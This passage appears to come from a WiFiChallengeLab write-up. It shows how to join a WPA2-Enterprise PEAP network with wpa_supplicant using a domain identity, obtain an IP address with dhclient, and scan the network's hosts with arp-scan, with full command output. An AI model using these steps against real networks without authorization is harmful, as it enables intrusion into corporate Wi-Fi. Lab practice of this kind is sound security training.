</p><p id="a8b09634-bfdd-46a7-8401-4bf1006c8c0b" class="">The content of <code>wpa_supplicant.conf</code> should look like this:</p><p id="c64c4d76-873a-4262-a994-f10ba0a10930" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="5f19e04e-8d1a-4536-816e-64549b22e7b5" class="code"><code class="language-Bash">network={  
  ssid=&quot;wifi-corp&quot;  
  scan_ssid=1  
  key_mgmt=WPA-EAP  
  identity=&quot;CONTOSO\juan.tr&quot;  
  password=&quot;PASSWORD&quot;  
  eap=PEAP  
  phase1=&quot;peaplabel=0&quot;  
  phase2=&quot;auth=MSCHAPV2&quot;  
}</code></pre><p id="5b641e6b-1ea0-4b24-a21f-2b755e9c131c" class="">
</p><p id="088322a7-4315-4802-b7dd-fda2472ac846" class="">A small side note is that the domain/username may be case sensitive. With the save configuration file we can try to connect to the WPA2 Enterprise network.</p><p id="221fed78-572b-486d-a65c-49f0801d7076" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="4b8d0a99-0762-45cf-b42b-6f4a341f0a10" class="code"><code class="language-Bash">root@WiFiChallengeLab:~# wpa_supplicant -i wlan0 -c wpa_supplicant.conf
Successfully initialized wpa_supplicant
wlan0: SME: Trying to authenticate with f0:9f:c2:71:22:15 (SSID=&#x27;wifi-corp&#x27; freq=5220 MHz)
wlan0: Trying to associate with f0:9f:c2:71:22:15 (SSID=&#x27;wifi-corp&#x27; freq=5220 MHz)
wlan0: Associated with f0:9f:c2:71:22:15
wlan0: CTRL-EVENT-SUBNET-STATUS-UPDATE status=0
wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 25 (PEAP) selected
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject=&#x27;/C=ES/ST=Madrid/L=Madrid/O=WiFiChallengeLab/OU=Certificate Authority/CN=WiFiChallengeLab CA/emailAddress=ca@WiFiChallengeLab.com&#x27; hash=cce1f1eadd3782f6d6eb9130e6c18e2806705d023edf9288583e4b89431816d4
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject=&#x27;/C=ES/ST=Madrid/L=Madrid/O=WiFiChallengeLab/OU=Certificate Authority/CN=WiFiChallengeLab CA/emailAddress=ca@WiFiChallengeLab.com&#x27; hash=cce1f1eadd3782f6d6eb9130e6c18e2806705d023edf9288583e4b89431816d4
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject=&#x27;/C=ES/L=Madrid/O=WiFiChallengeLab/OU=Server/CN=WiFiChallengeLab CA/emailAddress=server@WiFiChallengeLab.com&#x27; hash=ecfb568388cdd3b1e64a0643a6db40b613641e3592ff67b9e5539dbc9d572e85
EAP-MSCHAPV2: Authentication succeeded
wlan0: CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully
wlan0: PMKSA-CACHE-ADDED f0:9f:c2:71:22:15 0
wlan0: WPA: Key negotiation completed with f0:9f:c2:71:22:15 [PTK=CCMP GTK=CCMP]
wlan0: CTRL-EVENT-CONNECTED - Connection to f0:9f:c2:71:22:15 completed [id=0 id_str=]</code></pre><p id="6826b35c-5ef8-4795-acc3-a558b81ccd0e" class="">
</p><p id="673f65bd-8a35-4a4c-b15e-25618f7cc437" class="">Now we should ask an IP address to the DHCP server.</p><p id="09c9774f-5abb-4776-8743-25778df7392f" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="e9554042-7431-4106-bb3c-a5de5635c89d" class="code"><code class="language-Bash">root@WiFiChallengeLab:~# dhclient -v wlan0
Internet Systems Consortium DHCP Client 4.4.1
Copyright 2004-2018 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/

Listening on LPF/wlan0/02:00:00:00:00:00
Sending on   LPF/wlan0/02:00:00:00:00:00
Sending on   Socket/fallback
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 3 (xid=0xdc39781f)
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 6 (xid=0xdc39781f)
DHCPOFFER of 192.168.5.62 from 192.168.5.1
DHCPREQUEST for 192.168.5.62 on wlan0 to 255.255.255.255 port 67 (xid=0x1f7839dc)
DHCPACK of 192.168.5.62 from 192.168.5.1 (xid=0xdc39781f)
bound to 192.168.5.62 -- renewal in 34621 seconds.</code></pre><p id="865a4ac7-cbb0-4560-91fc-7ca2909a98a1" class="">
</p><p id="2e1794b7-4c0a-42b0-b026-aa48f7550c7c" class="">As soon as an IP address is assigned to our interface we can use arp-scan to identify hosts on the network.</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="d4fb528e-ba19-4868-8cb2-6cc803530c50" class="code"><code class="language-Bash">root@WiFiChallengeLab:~# arp-scan -l -I wlan0
Interface: wlan0, type: EN10MB, MAC: 02:00:00:00:00:00, IPv4: 192.168.5.62
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.5.1	f0:9f:c2:71:22:15	Ubiquiti Networks Inc.
192.168.5.61	64:32:a8:07:6c:40	Intel Corporate
192.168.5.61	64:32:a8:ba:6c:41	Intel Corporate (DUP: 2)
192.168.5.96	64:32:a8:07:6c:40	Intel Corporate
192.168.5.96	64:32:a8:ba:6c:41	Intel Corporate (DUP: 2)

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.164 seconds (118.30 hosts/sec). 5 responded</code></pre></div></article><span class="sans" style="font-size:14px;padding-top:2em"></span></body></html>